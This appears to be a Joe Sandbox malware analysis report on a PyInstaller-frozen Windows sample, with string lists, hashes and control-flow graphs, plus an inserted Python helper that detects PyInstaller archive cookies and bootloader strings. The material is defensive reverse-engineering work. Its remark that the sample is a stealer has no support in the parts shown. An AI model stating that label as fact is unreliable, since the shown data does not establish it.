• String ID: 00000000-0000-0000-0000-000000000000$00:00:00:00:00:00$00:00:00:FF:FF:FF$90DB8B89-0D35-4F79-8CE9-49EA0AC8B7CD$A42E7CDA-D03F-480C-9CC2-A4DE20ABB878$AF_APPLETALK$AF_BLUETOOTH$AF_DECnet$AF_HYPERV$AF_INET$AF_INET6$AF_IPX$AF_IRDA$AF_LINK$AF_SNA$AF_UNSPEC$AI_ADDRCONFIG$AI_ALL$AI_CANONNAME$AI_NUMERICHOST$AI_NUMERICSERV$AI_PASSIVE$AI_V4MAPPED$BDADDR_ANY$BDADDR_LOCAL$BTPROTO_RFCOMM$CAPI$E0E16197-DD56-4A10-9195-5EE7A155A838$EAI_AGAIN$EAI_BADFLAGS$EAI_FAIL$EAI_FAMILY$EAI_MEMORY$EAI_NODATA$EAI_NONAME$EAI_SERVICE$EAI_SOCKTYPE$FFFFFFFF-FFFF-FFFF-FFFF-FFFFFFFFFFFF$HVSOCKET_ADDRESS_FLAG_PASSTHRU$HVSOCKET_CONNECTED_SUSPEND$HVSOCKET_CONNECT_TIMEOUT$HVSOCKET_CONNECT_TIMEOUT_MAX$HV_GUID_BROADCAST$HV_GUID_CHILDREN$HV_GUID_LOOPBACK$HV_GUID_PARENT$HV_GUID_WILDCARD$HV_GUID_ZERO$HV_PROTOCOL_RAW$INADDR_ALLHOSTS_GROUP$INADDR_ANY$INADDR_BROADCAST$INADDR_LOOPBACK$INADDR_MAX_LOCAL_GROUP$INADDR_NONE$INADDR_UNSPEC_GROUP$IPPORT_RESERVED$IPPORT_USERRESERVED$IPPROTO_AH$IPPROTO_CBT$IPPROTO_DSTOPTS$IPPROTO_EGP$IPPROTO_ESP$IPPROTO_FRAGMENT$IPPROTO_GGP$IPPROTO_HOPOPTS$IPPROTO_ICLFXBM$IPPROTO_ICMP$IPPROTO_ICMPV6$IPPROTO_IDP$IPPROTO_IGMP$IPPROTO_IGP$IPPROTO_IP$IPPROTO_IPV4$IPPROTO_IPV6$IPPROTO_L2TP$IPPROTO_MAX$IPPROTO_ND$IPPROTO_NONE$IPPROTO_PGM$IPPROTO_PIM$IPPROTO_PUP$IPPROTO_RAW$IPPROTO_RDP$IPPROTO_ROUTING$IPPROTO_SCTP$IPPROTO_ST$IPPROTO_TCP$IPPROTO_UDP$IPV6_CHECKSUM$IPV6_DONTFRAG$IPV6_HOPLIMIT$IPV6_HOPOPTS$IPV6_JOIN_GROUP$IPV6_LEAVE_GROUP$IPV6_MULTICAST_HOPS$IPV6_MULTICAST_IF$IPV6_MULTICAST_LOOP$IPV6_PKTINFO$IPV6_RECVRTHDR$IPV6_RECVTCLASS$IPV6_RTHDR$IPV6_TCLASS$IPV6_UNICAST_HOPS$IPV6_V6ONLY$IP_ADD_MEMBERSHIP$IP_ADD_SOURCE_MEMBERSHIP$IP_BLOCK_SOURCE$IP_DROP_MEMBERSHIP$IP_DROP_SOURCE_MEMBERSHIP$IP_HDRINCL$IP_MULTICAST_IF$IP_MULTICAST_LOOP$IP_MULTICAST_TTL$IP_OPTIONS$IP_PKTINFO$IP_RECVDSTADDR$IP_RECVTOS$IP_TOS$IP_TTL$IP_UNBLOCK_SOURCE$MSG_BCAST$MSG_CTRUNC$MSG_DONTROUTE$MSG_ERRQUEUE$MSG_MCAST$MSG_OOB$MSG_PEEK$MSG_TRUNC$MSG_WAITALL$NI_DGRAM$NI_MAXHOST$NI_MAXSERV$NI_NAMEREQD$NI_NOFQDN$NI_NUMERICHOST$NI_NUMERICSERV$RCVALL_MAX$RCVALL_OFF$RCVALL_ON$RCVALL_SOCKETLEVELONLY$SHUT_RD$SHUT_RDWR$SHUT_WR$SIO_KEEPALIVE_VALS$SIO_LOOPBACK_FAST_PATH$SIO_RCVALL$SOCK_DGRAM$SOCK_RAW$SOCK_RDM$SOCK_SEQPACKET$SOCK_STREAM$SOL_IP$SOL_SOCKET$SOL_TCP$SOL_UDP$SOMAXCONN$SO_ACCEPTCONN$SO_BROADCAST$SO_DEBUG$SO_DONTROUTE$SO_ERROR$SO_EXCLUSIVEADDRUSE$SO_KEEPALIVE$SO_LINGER$SO_OOBINLINE$SO_RCVBUF$SO_RCVLOWAT$SO_RCVTIMEO$SO_REUSEADDR$SO_SNDBUF$SO_SNDLOWAT$SO_SNDTIMEO$SO_TYPE$SO_USELOOPBACK$SocketType$TCP_FASTOPEN$TCP_KEEPCNT$TCP_KEEPIDLE$TCP_KEEPINTVL$TCP_MAXSEG$TCP_NODELAY$WSAStartup failed: error code %d$WSAStartup failed: network not ready$WSAStartup failed: requested version not supported$_socket.CAPI$error$gaierror$has_ipv6$herror$socket.gaierror$socket.herror$timeout
• API String ID: 3409425757-1188461360
• Opcode ID: 4dce1cfbc17b3c99d7e4a2bf2870c05e4680d8e1b4ef0cfb511a93ced94c5d55
• Instruction ID: e3c54ee20d32e75cfac825bf8c526926c241c434da7d0ceb0e42ef44fe726468
• Opcode Fuzzy Hash: 4dce1cfbc17b3c99d7e4a2bf2870c05e4680d8e1b4ef0cfb511a93ced94c5d55
• Instruction Fuzzy Hash: EAD2F960B08B1396FB109FA6E8547BD2794AF47FD1F865435CA0E86260DF6DE188C31B
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.1496149556.00007FF8E8131000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8E8130000, based on PE: true
• Associated: 00000002.00000002.1495728438.00007FF8E8130000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1496149556.00007FF8E8141000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1496149556.00007FF8E8143000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1496149556.00007FF8E8146000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1496995524.00007FF8E8147000.00000080.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1497677293.00007FF8E8148000.00000004.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8e8130000_SecuriteInfo.jbxd
Similarity
• API ID: ConditionMask$00007A082InfoStartupVerifyVersion
• String ID: 00000000-0000-0000-0000-000000000000$00:00:00:00:00:00$00:00:00:FF:FF:FF$90DB8B89-0D35-4F79-8CE9-49EA0AC8B7CD$A42E7CDA-D03F-480C-9CC2-A4DE20ABB878$AF_APPLETALK$AF_BLUETOOTH$AF_DECnet$AF_HYPERV$AF_INET$AF_INET6$AF_IPX$AF_IRDA$AF_LINK$AF_SNA$AF_UNSPEC$AI_ADDRCONFIG$AI_ALL$AI_CANONNAME$AI_NUMERICHOST$AI_NUMERICSERV$AI_PASSIVE$AI_V4MAPPED$BDADDR_ANY$BDADDR_LOCAL$BTPROTO_RFCOMM$CAPI$E0E16197-DD56-4A10-9195-5EE7A155A838$EAI_AGAIN$EAI_BADFLAGS$EAI_FAIL$EAI_FAMILY$EAI_MEMORY$EAI_NODATA$EAI_NONAME$EAI_SERVICE$EAI_SOCKTYPE$FFFFFFFF-FFFF-FFFF-FFFF-FFFFFFFFFFFF$HVSOCKET_ADDRESS_FLAG_PASSTHRU$HVSOCKET_CONNECTED_SUSPEND$HVSOCKET_CONNECT_TIMEOUT$HVSOCKET_CONNECT_TIMEOUT_MAX$HV_GUID_BROADCAST$HV_GUID_CHILDREN$HV_GUID_LOOPBACK$HV_GUID_PARENT$HV_GUID_WILDCARD$HV_GUID_ZERO$HV_PROTOCOL_RAW$INADDR_ALLHOSTS_GROUP$INADDR_ANY$INADDR_BROADCAST$INADDR_LOOPBACK$INADDR_MAX_LOCAL_GROUP$INADDR_NONE$INADDR_UNSPEC_GROUP$IPPORT_RESERVED$IPPORT_USERRESERVED$IPPROTO_AH$IPPROTO_CBT$IPPROTO_DSTOPTS$IPPROTO_EGP$IPPROTO_ESP$IPPROTO_FRAGMENT$IPPROTO_GGP$IPPROTO_HOPOPTS$IPPROTO_ICLFXBM$IPPROTO_ICMP$IPPROTO_ICMPV6$IPPROTO_IDP$IPPROTO_IGMP$IPPROTO_IGP$IPPROTO_IP$IPPROTO_IPV4$IPPROTO_IPV6$IPPROTO_L2TP$IPPROTO_MAX$IPPROTO_ND$IPPROTO_NONE$IPPROTO_PGM$IPPROTO_PIM$IPPROTO_PUP$IPPROTO_RAW$IPPROTO_RDP$IPPROTO_ROUTING$IPPROTO_SCTP$IPPROTO_ST$IPPROTO_TCP$IPPROTO_UDP$IPV6_CHECKSUM$IPV6_DONTFRAG$IPV6_HOPLIMIT$IPV6_HOPOPTS$IPV6_JOIN_GROUP$IPV6_LEAVE_GROUP$IPV6_MULTICAST_HOPS$IPV6_MULTICAST_IF$IPV6_MULTICAST_LOOP$IPV6_PKTINFO$IPV6_RECVRTHDR$IPV6_RECVTCLASS$IPV6_RTHDR$IPV6_TCLASS$IPV6_UNICAST_HOPS$IPV6_V6ONLY$IP_ADD_MEMBERSHIP$IP_ADD_SOURCE_MEMBERSHIP$IP_BLOCK_SOURCE$IP_DROP_MEMBERSHIP$IP_DROP_SOURCE_MEMBERSHIP$IP_HDRINCL$IP_MULTICAST_IF$IP_MULTICAST_LOOP$IP_MULTICAST_TTL$IP_OPTIONS$IP_PKTINFO$IP_RECVDSTADDR$IP_RECVTOS$IP_TOS$IP_TTL$IP_UNBLOCK_SOURCE$MSG_BCAST$MSG_CTRUNC$MSG_DONTROUTE$MSG_ERRQUEUE$MSG_MCAST$MSG_OOB$MSG_PEEK$MSG_TRUNC$MSG_WAITALL$NI_DGRAM$NI_MAXHOST$NI_MAXSERV$NI_NAMEREQD$NI_NOFQDN$NI_NUMERICHOST$NI_NUMERICSERV$RCVALL_MAX$RCVALL_OFF$RCVALL_ON$RCVALL_SOCKETLEVELONLY$SHUT_RD$SHUT_RDWR$SHUT_WR$SIO_KEEPALIVE_VALS$SIO_LOOPBACK_FAST_PATH$SIO_RCVALL$SOCK_DGRAM$SOCK_RAW$SOCK_RDM$SOCK_SEQPACKET$SOCK_STREAM$SOL_IP$SOL_SOCKET$SOL_TCP$SOL_UDP$SOMAXCONN$SO_ACCEPTCONN$SO_BROADCAST$SO_DEBUG$SO_DONTROUTE$SO_ERROR$SO_EXCLUSIVEADDRUSE$SO_KEEPALIVE$SO_LINGER$SO_OOBINLINE$SO_RCVBUF$SO_RCVLOWAT$SO_RCVTIMEO$SO_REUSEADDR$SO_SNDBUF$SO_SNDLOWAT$SO_SNDTIMEO$SO_TYPE$SO_USELOOPBACK$SocketType$TCP_FASTOPEN$TCP_KEEPCNT$TCP_KEEPIDLE$TCP_KEEPINTVL$TCP_MAXSEG$TCP_NODELAY$_socket.CAPI$error$gaierror$has_ipv6$herror$socket.gaierror$socket.herror$timeout
• API String ID: 3409425757-3643889990
• Opcode ID: 402a8c535e09a4f8d89ed768b117a8b9010c23cdf2382df9e6d88d85c51fdd0b
• Instruction ID: 42c73c00293865f926743013a11b8892a89cdffb63ab86cedf0214c3fe8dcea2
• Opcode Fuzzy Hash: 402a8c535e09a4f8d89ed768b117a8b9010c23cdf2382df9e6d88d85c51fdd0b
• Instruction Fuzzy Hash: 0DC2E960B08B1396FB109FA6F8507AD2794AF47FD1F865435CA0E86660DF6DE188C31B

Control-flow Graph

• Executed
• Not Executed
                                                                                                                                                                                                                              control_flow_graph 1205 7ff7ead01000-7ff7ead03806 call 7ff7ead0fe18 call 7ff7ead0fe20 call 7ff7ead0c850 call 7ff7ead153f0 call 7ff7ead15484 call 7ff7ead036b0 1219 7ff7ead03814-7ff7ead03836 call 7ff7ead01950 1205->1219 1220 7ff7ead03808-7ff7ead0380f 1205->1220 1226 7ff7ead0383c-7ff7ead03856 call 7ff7ead01c80 1219->1226 1227 7ff7ead0391b-7ff7ead03931 call 7ff7ead045c0 1219->1227 1221 7ff7ead03c97-7ff7ead03cb2 call 7ff7ead0c550 1220->1221 1231 7ff7ead0385b-7ff7ead0389b call 7ff7ead08830 1226->1231 1233 7ff7ead03933-7ff7ead03960 call 7ff7ead07f90 1227->1233 1234 7ff7ead0396a-7ff7ead0397f call 7ff7ead02710 1227->1234 1238 7ff7ead038c1-7ff7ead038cc call 7ff7ead14f30 1231->1238 1239 7ff7ead0389d-7ff7ead038a3 1231->1239 1245 7ff7ead03984-7ff7ead039a6 call 7ff7ead01c80 1233->1245 1246 7ff7ead03962-7ff7ead03965 call 7ff7ead1004c 1233->1246 1247 7ff7ead03c8f 1234->1247 1254 7ff7ead038d2-7ff7ead038e1 call 7ff7ead08830 1238->1254 1255 7ff7ead039fc-7ff7ead03a2a call 7ff7ead08940 call 7ff7ead089a0 * 3 1238->1255 1242 7ff7ead038a5-7ff7ead038ad 1239->1242 1243 7ff7ead038af-7ff7ead038bd call 7ff7ead089a0 1239->1243 1242->1243 1243->1238 1256 7ff7ead039b0-7ff7ead039b9 1245->1256 1246->1234 1247->1221 1263 7ff7ead039f4-7ff7ead039f7 call 7ff7ead14f30 1254->1263 1264 7ff7ead038e7-7ff7ead038ed 1254->1264 1280 7ff7ead03a2f-7ff7ead03a3e call 7ff7ead08830 1255->1280 1256->1256 1259 7ff7ead039bb-7ff7ead039d8 call 7ff7ead01950 1256->1259 1259->1231 1271 7ff7ead039de-7ff7ead039ef call 7ff7ead02710 1259->1271 1263->1255 1268 7ff7ead038f0-7ff7ead038fc 1264->1268 1272 7ff7ead03905-7ff7ead03908 1268->1272 1273 7ff7ead038fe-7ff7ead03903 1268->1273 1271->1247 1272->1263 1275 7ff7ead0390e-7ff7ead03916 call 7ff7ead14f30 1272->1275 1273->1268 1273->1272 1275->1280 1284 
7ff7ead03b45-7ff7ead03b53 1280->1284 1285 7ff7ead03a44-7ff7ead03a47 1280->1285 1286 7ff7ead03b59-7ff7ead03b5d 1284->1286 1287 7ff7ead03a67 1284->1287 1285->1284 1288 7ff7ead03a4d-7ff7ead03a50 1285->1288 1289 7ff7ead03a6b-7ff7ead03a90 call 7ff7ead14f30 1286->1289 1287->1289 1290 7ff7ead03a56-7ff7ead03a5a 1288->1290 1291 7ff7ead03b14-7ff7ead03b17 1288->1291 1300 7ff7ead03a92-7ff7ead03aa6 call 7ff7ead08940 1289->1300 1301 7ff7ead03aab-7ff7ead03ac0 1289->1301 1290->1291 1292 7ff7ead03a60 1290->1292 1293 7ff7ead03b2f-7ff7ead03b40 call 7ff7ead02710 1291->1293 1294 7ff7ead03b19-7ff7ead03b1d 1291->1294 1292->1287 1304 7ff7ead03c7f-7ff7ead03c87 1293->1304 1294->1293 1296 7ff7ead03b1f-7ff7ead03b2a 1294->1296 1296->1289 1300->1301 1302 7ff7ead03ac6-7ff7ead03aca 1301->1302 1303 7ff7ead03be8-7ff7ead03bfa call 7ff7ead08830 1301->1303 1307 7ff7ead03ad0-7ff7ead03ae8 call 7ff7ead15250 1302->1307 1308 7ff7ead03bcd-7ff7ead03be2 call 7ff7ead01940 1302->1308 1312 7ff7ead03c2e 1303->1312 1313 7ff7ead03bfc-7ff7ead03c02 1303->1313 1304->1247 1318 7ff7ead03b62-7ff7ead03b7a call 7ff7ead15250 1307->1318 1319 7ff7ead03aea-7ff7ead03b02 call 7ff7ead15250 1307->1319 1308->1302 1308->1303 1320 7ff7ead03c31-7ff7ead03c40 call 7ff7ead14f30 1312->1320 1316 7ff7ead03c04-7ff7ead03c1c 1313->1316 1317 7ff7ead03c1e-7ff7ead03c2c 1313->1317 1316->1320 1317->1320 1327 7ff7ead03b7c-7ff7ead03b80 1318->1327 1328 7ff7ead03b87-7ff7ead03b9f call 7ff7ead15250 1318->1328 1319->1308 1329 7ff7ead03b08-7ff7ead03b0f 1319->1329 1330 7ff7ead03c46-7ff7ead03c4a 1320->1330 1331 7ff7ead03d41-7ff7ead03d63 call 7ff7ead044e0 1320->1331 1327->1328 1340 7ff7ead03ba1-7ff7ead03ba5 1328->1340 1341 7ff7ead03bac-7ff7ead03bc4 call 7ff7ead15250 1328->1341 1329->1308 1333 7ff7ead03cd4-7ff7ead03ce6 call 7ff7ead08830 1330->1333 1334 7ff7ead03c50-7ff7ead03c5f call 7ff7ead090e0 1330->1334 1344 7ff7ead03d65-7ff7ead03d6f call 7ff7ead04630 1331->1344 1345 7ff7ead03d71-7ff7ead03d82 call 7ff7ead01c80 1331->1345 1351 7ff7ead03d35-7ff7ead03d3c 
1333->1351 1352 7ff7ead03ce8-7ff7ead03ceb 1333->1352 1349 7ff7ead03cb3-7ff7ead03cbd call 7ff7ead08660 1334->1349 1350 7ff7ead03c61 1334->1350 1340->1341 1341->1308 1364 7ff7ead03bc6 1341->1364 1355 7ff7ead03d87-7ff7ead03d96 1344->1355 1345->1355 1369 7ff7ead03cbf-7ff7ead03cc6 1349->1369 1370 7ff7ead03cc8-7ff7ead03ccf 1349->1370 1358 7ff7ead03c68 call 7ff7ead02710 1350->1358 1351->1358 1352->1351 1353 7ff7ead03ced-7ff7ead03d10 call 7ff7ead01c80 1352->1353 1371 7ff7ead03d12-7ff7ead03d26 call 7ff7ead02710 call 7ff7ead14f30 1353->1371 1372 7ff7ead03d2b-7ff7ead03d33 call 7ff7ead14f30 1353->1372 1361 7ff7ead03dc4-7ff7ead03dda call 7ff7ead09390 1355->1361 1362 7ff7ead03d98-7ff7ead03d9f 1355->1362 1365 7ff7ead03c6d-7ff7ead03c77 1358->1365 1377 7ff7ead03ddc 1361->1377 1378 7ff7ead03de8-7ff7ead03e04 SetDllDirectoryW 1361->1378 1362->1361 1367 7ff7ead03da1-7ff7ead03da5 1362->1367 1364->1308 1365->1304 1367->1361 1373 7ff7ead03da7-7ff7ead03dbe SetDllDirectoryW LoadLibraryExW 1367->1373 1369->1358 1370->1355 1371->1365 1372->1355 1373->1361 1377->1378 1381 7ff7ead03f01-7ff7ead03f08 1378->1381 1382 7ff7ead03e0a-7ff7ead03e19 call 7ff7ead08830 1378->1382 1384 7ff7ead03f0e-7ff7ead03f15 1381->1384 1385 7ff7ead04008-7ff7ead04010 1381->1385 1392 7ff7ead03e32-7ff7ead03e3c call 7ff7ead14f30 1382->1392 1393 7ff7ead03e1b-7ff7ead03e21 1382->1393 1384->1385 1389 7ff7ead03f1b-7ff7ead03f25 call 7ff7ead033c0 1384->1389 1390 7ff7ead04035-7ff7ead04040 call 7ff7ead036a0 call 7ff7ead03360 1385->1390 1391 7ff7ead04012-7ff7ead0402f PostMessageW GetMessageW 1385->1391 1389->1365 1403 7ff7ead03f2b-7ff7ead03f3f call 7ff7ead090c0 1389->1403 1404 7ff7ead04045-7ff7ead04067 call 7ff7ead03670 call 7ff7ead06fc0 call 7ff7ead06d70 1390->1404 1391->1390 1405 7ff7ead03ef2-7ff7ead03efc call 7ff7ead08940 1392->1405 1406 7ff7ead03e42-7ff7ead03e48 1392->1406 1397 7ff7ead03e23-7ff7ead03e2b 1393->1397 1398 7ff7ead03e2d-7ff7ead03e2f 1393->1398 1397->1398 1398->1392 1412 7ff7ead03f64-7ff7ead03fa7 call 7ff7ead08940 call 
7ff7ead089e0 call 7ff7ead06fc0 call 7ff7ead06d70 call 7ff7ead088e0 1403->1412 1413 7ff7ead03f41-7ff7ead03f5e PostMessageW GetMessageW 1403->1413 1405->1381 1406->1405 1410 7ff7ead03e4e-7ff7ead03e54 1406->1410 1415 7ff7ead03e56-7ff7ead03e58 1410->1415 1416 7ff7ead03e5f-7ff7ead03e61 1410->1416 1454 7ff7ead03ff5-7ff7ead04003 call 7ff7ead01900 1412->1454 1455 7ff7ead03fa9-7ff7ead03fbf call 7ff7ead08ed0 call 7ff7ead088e0 1412->1455 1413->1412 1419 7ff7ead03e5a 1415->1419 1420 7ff7ead03e67-7ff7ead03e83 call 7ff7ead06dc0 call 7ff7ead07340 1415->1420 1416->1381 1416->1420 1419->1381 1432 7ff7ead03e85-7ff7ead03e8c 1420->1432 1433 7ff7ead03e8e-7ff7ead03e95 1420->1433 1435 7ff7ead03edb-7ff7ead03ef0 call 7ff7ead02a50 call 7ff7ead06fc0 call 7ff7ead06d70 1432->1435 1436 7ff7ead03eaf-7ff7ead03eb9 call 7ff7ead071b0 1433->1436 1437 7ff7ead03e97-7ff7ead03ea4 call 7ff7ead06e00 1433->1437 1435->1381 1449 7ff7ead03ec4-7ff7ead03ed2 call 7ff7ead074f0 1436->1449 1450 7ff7ead03ebb-7ff7ead03ec2 1436->1450 1437->1436 1448 7ff7ead03ea6-7ff7ead03ead 1437->1448 1448->1435 1449->1381 1462 7ff7ead03ed4 1449->1462 1450->1435 1454->1365 1455->1454 1466 7ff7ead03fc1-7ff7ead03fd6 1455->1466 1462->1435 1467 7ff7ead03ff0 call 7ff7ead02a50 1466->1467 1468 7ff7ead03fd8-7ff7ead03feb call 7ff7ead02710 call 7ff7ead01900 1466->1468 1467->1454 1468->1365
Strings
Memory Dump Source
• Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID: ErrorFileLastModuleName
• String ID (the report joins these with `$`; listed one per line):
  • Could not create temporary directory!
  • Could not load PyInstaller's embedded PKG archive from the executable (%s)
  • Could not side-load PyInstaller's PKG archive from external file (%s)
  • Failed to convert DLL search path!
  • Failed to initialize security descriptor for temporary directory!
  • Failed to load Tcl/Tk shared libraries for splash screen!
  • Failed to load splash screen resources!
  • Failed to remove temporary directory: %s
  • Failed to start splash screen!
  • Failed to unpack splash screen dependencies from PKG archive!
  • Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s
  • MEI
  • PYINSTALLER_RESET_ENVIRONMENT
  • PYINSTALLER_STRICT_UNPACK_MODE
  • PYINSTALLER_SUPPRESS_SPLASH_SCREEN
  • Path exceeds PYI_PATH_MAX limit.
  • Py_GIL_DISABLED
  • VCRUNTIME140.dll
  • _PYI_APPLICATION_HOME_DIR
  • _PYI_APPLICATION_HOME_DIR not set for onefile child process!
  • _PYI_ARCHIVE_FILE
  • _PYI_PARENT_PROCESS_LEVEL
  • _PYI_SPLASH_IPC
  • bye-runtime-tmpdir
  • pkg
  • pyi-contents-directory
  • pyi-disable-windowed-traceback
  • pyi-python-flag
• API String ID: 2776309574-3273434969
• Opcode ID: 233ec7f25ec1ed803ce179537cd482b57a2e4efc6b2dbb8e538fcab84ef42543
• Instruction ID: 1110fc5f604bc3514105ae1ad6e894e3176ad781bc1424d71341d14022e255bb
• Opcode Fuzzy Hash: 233ec7f25ec1ed803ce179537cd482b57a2e4efc6b2dbb8e538fcab84ef42543
• Instruction Fuzzy Hash: E9327C21A08A8291FB19F72594943F9A762EF54788FC440B7DA5D432CAEF7CE558C332
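The string set above (the `_PYI_*` environment names, the `PYINSTALLER_*` switches and the PKG-archive error messages) belongs to the PyInstaller bootloader, so the sample is a Python program frozen with PyInstaller and its real payload sits in the appended archive rather than in the native code these graphs cover. The Python below is an added triage helper, not part of the Joe Sandbox report and not PyInstaller's own code: it locates the archive cookie by its magic and checks a file for the bootloader strings the report lists. The cookie layout (`!8sIIIi64s`) is the one PyInstaller's CArchive writer emits; the sample bytes are constructed, and the version-number decoding for old bootloaders is an assumption called out in the code.

```python
"""Triage helper for PyInstaller-frozen executables.

Added example (not from the Joe Sandbox report or from PyInstaller). Two
indicators are checked: the CArchive cookie that the bootloader looks for
from the end of the executable, and the bootloader's own environment and
error strings (the set the report lists under String ID). All sample
bytes below are constructed; nothing is read from disk.
"""
import struct
from typing import Optional, Tuple

# First 8 bytes of PyInstaller's CArchive cookie: b"MEI\014\013\012\013\016".
PYI_MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"
# Cookie layout used by PyInstaller's CArchive writer (big-endian): magic,
# total PKG length, TOC offset, TOC length, Python version, Python DLL name.
COOKIE_FMT = "!8sIIIi64s"
COOKIE_LEN = struct.calcsize(COOKIE_FMT)  # 88 bytes

# Bootloader-only strings, taken from the report's String ID list above.
BOOTLOADER_STRINGS = (
    b"_PYI_ARCHIVE_FILE",
    b"_PYI_PARENT_PROCESS_LEVEL",
    b"_PYI_APPLICATION_HOME_DIR",
    b"_PYI_SPLASH_IPC",
    b"PYINSTALLER_STRICT_UNPACK_MODE",
    b"PYINSTALLER_RESET_ENVIRONMENT",
    b"pyi-contents-directory",
    b"Could not load PyInstaller's embedded PKG archive",
)


def find_cookie(data: bytes) -> Optional[Tuple[int, dict]]:
    """Locate the last cookie in `data` and decode it; None if absent.

    Searching backwards mirrors the bootloader, which scans from the end of
    the executable so that an archive appended after the PE is still found.
    """
    pos = data.rfind(PYI_MAGIC)
    if pos < 0 or pos + COOKIE_LEN > len(data):
        return None
    _magic, pkg_len, toc_off, toc_len, pyvers, pylib = struct.unpack_from(COOKIE_FMT, data, pos)
    # Current PyInstaller stores major*100+minor (e.g. 312). Older bootloaders
    # used major*10+minor; decoding values below 100 that way is an assumption.
    major, minor = divmod(pyvers, 100) if pyvers >= 100 else divmod(pyvers, 10)
    return pos, {
        "pkg_len": pkg_len,
        "toc_offset": toc_off,
        "toc_len": toc_len,
        "python_version": "%d.%d" % (major, minor),
        "pylib": pylib.rstrip(b"\0").decode("ascii", "replace"),
    }


def find_bootloader_strings(data: bytes) -> list:
    """Return the bootloader strings present; both ASCII and UTF-16LE forms
    are tried so a string stored wide is not missed."""
    hits = []
    for s in BOOTLOADER_STRINGS:
        if s in data or s.decode("ascii").encode("utf-16-le") in data:
            hits.append(s.decode("ascii"))
    return hits


def triage(data: bytes) -> dict:
    """Combine both indicators into a verdict a triage queue can key on."""
    cookie = find_cookie(data)
    strings = find_bootloader_strings(data)
    if cookie and strings:
        verdict = "pyinstaller-executable"
    elif cookie:
        verdict = "pyinstaller-archive-without-bootloader-strings"
    elif strings:
        # Bootloader code without an embedded archive: the PKG may be
        # side-loaded from an external file, a case the report's own error
        # strings mention.
        verdict = "bootloader-strings-only"
    else:
        verdict = "no-pyinstaller-indicators"
    return {
        "cookie_offset": cookie[0] if cookie else None,
        "cookie": cookie[1] if cookie else None,
        "bootloader_strings": strings,
        "verdict": verdict,
    }


def build_sample() -> bytes:
    """Constructed stand-in for a frozen binary: a fake PE stub carrying two
    bootloader strings, a fake PKG blob, and a cookie describing that blob."""
    stub = b"MZ" + b"\x90" * 64 + b"_PYI_ARCHIVE_FILE\0pyi-contents-directory\0"
    pkg = b"PKG" * 50
    cookie = struct.pack(COOKIE_FMT, PYI_MAGIC, len(pkg) + COOKIE_LEN, 16, 8, 312, b"python312.dll")
    return stub + pkg + cookie


if __name__ == "__main__":
    print(triage(build_sample()))
```

On a real sample, pass the file contents to `triage()`; a positive cookie gives the Python version and the DLL name the frozen program expects, which tells you which CPython build is needed to decompile the extracted `.pyc` files once the PKG is unpacked. The native-code graphs on this page describe only the bootloader and its runtime, so the stealer logic itself has to be recovered from that archive.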

Control-flow Graph

Function at 7ff7ead26964 (edge list not reproduced; the report's rendered graph distinguishes executed from not-executed blocks). Windows APIs called: CreateFileW (three call sites, one of them a re-open after CloseHandle), GetFileType, GetLastError, CloseHandle. The _invalid_parameter_noinfo reference in the API ID below marks this as CRT-internal file-open code rather than the bootloader's own logic.
APIs
Memory Dump Source
• Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
• String ID:
• API String ID: 1617910340-0
• Opcode ID: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
• Instruction ID: f9aed6a51e478cb4b00645d73990b07bc78f0d13bd230059b6e4c11a6b0e5bdb
• Opcode Fuzzy Hash: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
• Instruction Fuzzy Hash: 6DC1D036B28B4285FB10EF64C4906AC7761F749B98F8142B6DE2E97398CF38D111C321
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.1474223714.00007FF8E6C89000.00000080.00000001.01000000.0000000F.sdmp, Offset: 00007FF8E6780000, based on PE: true
• Associated: 00000002.00000002.1469350124.00007FF8E6780000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1469630464.00007FF8E6781000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1469630464.00007FF8E6792000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1469630464.00007FF8E67A2000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1469630464.00007FF8E67A8000.00000040.00000001.01000000.0000000F.sdmp
